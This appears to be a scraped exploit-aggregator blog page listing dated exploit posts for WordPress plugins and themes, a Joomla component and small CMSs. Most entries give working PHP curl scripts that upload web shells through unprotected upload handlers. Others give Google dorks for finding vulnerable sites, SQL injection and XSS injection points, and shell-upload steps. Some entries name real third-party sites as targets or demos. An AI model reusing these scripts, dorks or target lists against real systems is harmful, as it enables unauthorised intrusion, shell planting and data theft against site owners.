Exploits

WordPress amerisale-re Remote file Upload Vulnerability

By |February 8th, 2014|

Exploit Title : WordPress amerisale-re Plugin Remote Shell Upload
Exploit Author : T3rm!nat0r5
Google Dork : inurl:/wp-content/plugins/amerisale-re
Vendor Homepage : http://wordpress.org/
Date : 2014/01/30
Tested on : Windows 8 , Linux
This module requires Metasploit: http://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework

CoDE:

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress amerisale-re Plugin Remote Shell Upload',
      'Description' => %q{
        This module exploits an arbitrary […]


WordPress Dandelion Theme Shell Upload Vulnerability

By |February 8th, 2014|

Exploit Title: WordPress Dandelion Theme Shell Upload Vulnerability
Google Dork: inurl:/wp-content/themes/dandelion/
Date: 31/01/2014
Exploit Author: TheBlackMonster (Marouane)
Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
Software Link: Not Available
Version: Web Application
Tested on: Mozilla, Chrome, Opera -> Windows & Linux

CoDE:

<?php
$uploadfile = "yourfile.php";
$ch = curl_init("http://127.0.0.1:8080/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

File Access :

http://127.0.0.1:8080/uploads/[years]/[month]/your_shell.php


WordPress Blogfolio Theme Arbitrary File Upload Vulnerability

By |January 3rd, 2014|

Title : WordPress Blogfolio Theme Arbitrary File Upload Vulnerability
Author : eX-Sh1Ne
Date : 23/11/2013
Category : Web Applications
Type : PHP
Vendor : http://themify.me/
Download : http://themify.me/themes/blogfolio
Tested : Mozilla, Chrome -> Windows
Vulnerability : Arbitrary File Upload
Dork : inurl:wp-content/themes/blogfolio/

Exploit:
<?php
$uploadfile = "sh1ne.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access
http://127.0.0.1/[PATH]/wp-content/themes/blogfolio/uploads/sh1ne.php
or
http://127.0.0.1/[PATH]/wp-content/uploads/[years]/[month]/ > […]


WordPress dzs-videogallery Plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress dzs-videogallery Plugins Remote File Upload Vulnerability
Author: iskorpitx
Date: 22/11/2013
Vendor Homepage: http://digitalzoomstudio.net
Themes Link: http://digitalzoomstudio.net/docs/wpvideogallery/
Infected File: upload.php
Category: webapps
Google dork: inurl:/wp-content/plugins/dzs-videogallery/
Tested on : Windows/Linux
<?php
$uploadfile = "";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file_field' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
uploaded file:
http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/upload.html


WP page-flip-image-gallery plugins Remote File Upload Vulnerability

By |January 3rd, 2014|

Exploit Title: WordPress page-flip-image-gallery plugins Remote File Upload Vulnerability
Author: Ashiyane Digital Security Team
Date: 12/06/2013
Vendor Homepage: http://pageflipgallery.com
Software Link : http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
Tested on: Windows/Linux

1)Exploit :
<?php
$uploadfile = "file.php";
$ch = curl_init("http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
2) Exploit demo :
uploaded file:
http://[Target]/wp-content/uploads/file.php


Imaweb SQL injection Vulnerability

By |December 30th, 2013|

Exploit Title : imaweb SQL injection vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://www.imaweb.fr
Google Dork : intext:Réalisation du site Internet par Imaweb
Date: 2013-12-25
Tested on: Windows 7
discovered by : ACC3SS

Location :
localhost/public/index.php?act=photo_afficher&code=pub_phototheque2&num=[Sql Injection]
Demo:


joomla com_joomleague execute arbitrary PHP code Exploit

By |November 4th, 2013|

Exploit Title: joomla com_joomleague execute arbitrary PHP code Exploit
Google Dork: inurl:com_joomleague
Date: [01-11-2013]
Exploit Author: wantexz
Vendor Homepage: http://www.joomleague.net/
Software Link: http://www.joomleague.net/index.php?option=com_jdownloads&Itemid=104&view=viewdownload&catid=2359&cid=242&lang=en
Version: com_joomleague
Tested on: [wantexz]
CVE :
target tested: http://badminton.loiret.free.fr//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php

POC: 
<?php
$options = getopt('u:f:');

if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f IDC.php\n
-u http://target.com/ The full path to Joomla!
-f IDC.php The name of the file to create.\n");

$url = $options['u'];
$file = $options['f'];
$shell = […]


Catmis Sql Injection Vulnerability

By |November 4th, 2013|

Exploit Title : Catmis Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://code.google.com/p/catmis/
Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
Date: 2013/11/102

Tested on: Windows 7 , Linux
——————————————————————-
Exploit : Sql Injection
Location : [Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection]
Proof:


WordPress fgallery plus Plugin Xss vulnerabilities

By |October 10th, 2013|

Exploit Title : WordPress fgallery plus Plugin Xss vulnerabilities
Author : Iranian Exploit DataBase
Discovered By : IeDb
Home : http://iedb.ir – http://iedb.ir/acc
Software Link : http://wordpress.org/
Security Risk : High
Tested on : Linux
Dork : inurl:/plugins/fgallery_plus/
Exploit :
http://sXXom/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
Dem0 :

http://alXXdk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3[xss]
http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3[xss]
Tnx To : TaK.FaNaR – l4tr0d3ctism – r3d_s0urc3 – Bl4ck M4n – Medrik – Dj.TiniVini –
dr.koderz – z3r0 – Mr Zer0
B3hz4d […]


WordPress Lazy SEO plugin Shell Upload Vulnerability

By |October 10th, 2013|

exploit Title : WordPress Lazy SEO plugin Shell Upload Vulnerability
Exploit Author : Ashiyane Digital Security Team
Discovered By : ACC3SS
Google Dork: : inurl:/wp-content/plugins/lazy-seo/
Date: 2013/09/21
Vendor Homepage : http://wordpress.org/plugins/lazy-seo
Software Link : http://downloads.wordpress.org/plugin/lazy-seo.1.1.9.zip
Version : 1.1.9
Tested on: Windows

Location:
Site/wp-content/plugins/lazy-seo/lazyseo.php
1.Go to address : Site/wp-content/plugins/lazy-seo/lazyseo.php
2.Click on Browse…
3.Select Shell Code
3.Complete the fields
4.Press Enter
5.Shell Address : wp-content/plugins/lazy-seo/Shell.php

Demo:
http://www.dXus.com/wp-content/plugins/lazy-seo/lazyseo.php
http://noteclX.com/wp-content/plugins/lazy-seo/lazyseo.php
